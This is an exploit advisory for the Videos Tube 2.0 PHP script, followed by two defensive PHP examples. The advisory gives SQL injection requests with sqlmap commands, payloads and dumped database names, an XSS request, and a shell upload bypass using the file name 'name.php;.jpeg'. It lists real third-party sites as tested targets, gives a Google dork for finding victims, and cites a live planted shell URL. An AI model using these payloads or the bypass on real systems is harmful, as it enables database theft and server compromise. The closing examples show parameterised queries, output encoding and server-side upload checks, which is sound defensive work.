`Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -
[+] Greetz to : http://1337day.com - http://milw00rm.com
KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Videos Tube
|~Price : FREE
|~Version : 2.0, updated to the latest version.
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload
|~Google DORK : "© 2014, Videos Tube. Tüm Haklarý Saklýdýr."
|[~]Date : "15 Nov. 2014"
|[~]Tested on : Kali Linux
Tested on Demos;
http://demo.phpscriptlerim.com/free/videostube/
http://www.týger61.com/
http://www.birkovabuziddiasi.com/
http://video.egitimledirilis.com/
====================== SQL Injection Vulnerability (POST Method) ===============
Example; http://demo.phpscriptlerim.com/free/videostube/
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST :/ search=[SQL Injection]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[Post Method SQL Injection]&ara=
..
..
##############Exploitation sqlmap console.##########
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs
####################################################
---
Place: POST
Parameter: search
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: search=-6400' OR (6785=6785)#&ara=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: search=' AND SLEEP(5)#&ara=
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.34
back-end DBMS: MySQL 5.0.11
[01:16:58] [INFO] fetching database names
[01:16:58] [INFO] fetching number of databases
[01:16:58] [WARNING] reflective value(s) found and filtering out
[01:16:58] [INFO] resumed: 2
[01:16:58] [INFO] resumed: information_schema
[01:16:58] [INFO] resumed: phpscrip_videostube
available databases [2]:
[*] information_schema
[*] phpscrip_videostube
==============================================================================
==============================================================================
==================Cross Site Scripting Vulnerability =========================
Target: http://demo.phpscriptlerim.com/free/videostube/search.php
POST to :/ search=[XSS]&ara=
-------------------------------------------------------------
POST /free/videostube/search.php HTTP/1.1
Host: demo.phpscriptlerim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
search=[XSS]&ara=
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==============================================================================
==============================================================================
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======
INFO:
First, access the admin panel: http://www.TARGET.com/yonetim/
Then go to:
http://www.VICTIM.com/upload/upload.php
For the bypass, the shell file name is "name.php;.jpeg",
and then, using Tamper Data, the file can be uploaded. The shell upload was tested.
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php
=============================================================
# milw00rm.com [2014-11-15]
`
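Both the SQL injection and the XSS findings above go through the same `search` POST parameter of search.php, so one hardened handler covers both. The following is an added example, not code from the advisory or from Videos Tube: the `videos` table, the `title` column, both function names and the in-memory SQLite database are assumptions made so it runs offline.

```php
<?php
declare(strict_types=1);

// Query side: the search term is bound as data, never concatenated into SQL.
// `videos` and `title` are assumed names, not the application's real schema.
function find_videos(PDO $db, string $term): array
{
    // Neutralise LIKE wildcards; '!' is the escape character declared below.
    $literal = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
    $stmt = $db->prepare("SELECT title FROM videos WHERE title LIKE :q ESCAPE '!'");
    $stmt->execute([':q' => '%' . $literal . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Output side: everything echoed into HTML is entity-encoded first.
function render_results(string $term, array $titles): string
{
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '<h2>Results for ' . $e($term) . '</h2><ul>';
    foreach ($titles as $title) {
        $html .= '<li>' . $e($title) . '</li>';
    }
    return $html . '</ul>';
}

// In-memory SQLite stands in for MySQL so the example runs offline. Against
// MySQL, also set PDO::ATTR_EMULATE_PREPARES to false for server-side binds.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE videos (title TEXT)');
$db->exec("INSERT INTO videos (title) VALUES ('Intro to PHP'), ('Cat video')");

// Constructed inputs: a normal term, the boolean-based payload shape from the
// sqlmap output, and a markup string standing in for the [XSS] placeholder.
$inputs = ['cat', "-6400' OR (6785=6785)#", '<script>alert(1)</script>'];
foreach ($inputs as $term) {
    $rows = find_videos($db, $term);
    echo count($rows), ' row(s): ', render_results($term, $rows), PHP_EOL;
}
```

With the term bound as a parameter, the quote and comment characters in the payload are matched as literal text, and the encoded output renders the markup string as text instead of executing it.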
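The upload finding above depends on the server deriving the stored extension from a client-controlled name ("name.php;.jpeg") or from request fields that can be altered in transit. The following is an added example of the server-side check, not code from the advisory or from Videos Tube: the function name, the allowlist and the sample files are assumptions, and the stored name is chosen entirely by the server from the file's content.

```php
<?php
declare(strict_types=1);

// Assumed allowlist: detected content type => extension the server assigns.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the server-chosen name to store the upload under, or null to reject.
// The client-supplied file name and Content-Type are deliberately never read.
function stored_name_for_upload(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
}

// Constructed samples keyed by the name a client might send. In a real handler
// the path is $_FILES[...]['tmp_name'], checked with is_uploaded_file() and
// stored with move_uploaded_file() in a directory where scripts never execute.
$samples = [
    'name.php;.jpeg' => "<?php echo 'constructed test content'; ?>",
    'photo.png'      => base64_decode(
        'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
    ),
];
foreach ($samples as $clientName => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    echo $clientName, ' => ', stored_name_for_upload($tmp) ?? 'rejected', PHP_EOL;
    unlink($tmp);
}
```

Content sniffing alone does not stop an image that also embeds script text; the protection comes from the allowlisted extension combined with an upload directory that is served without script execution.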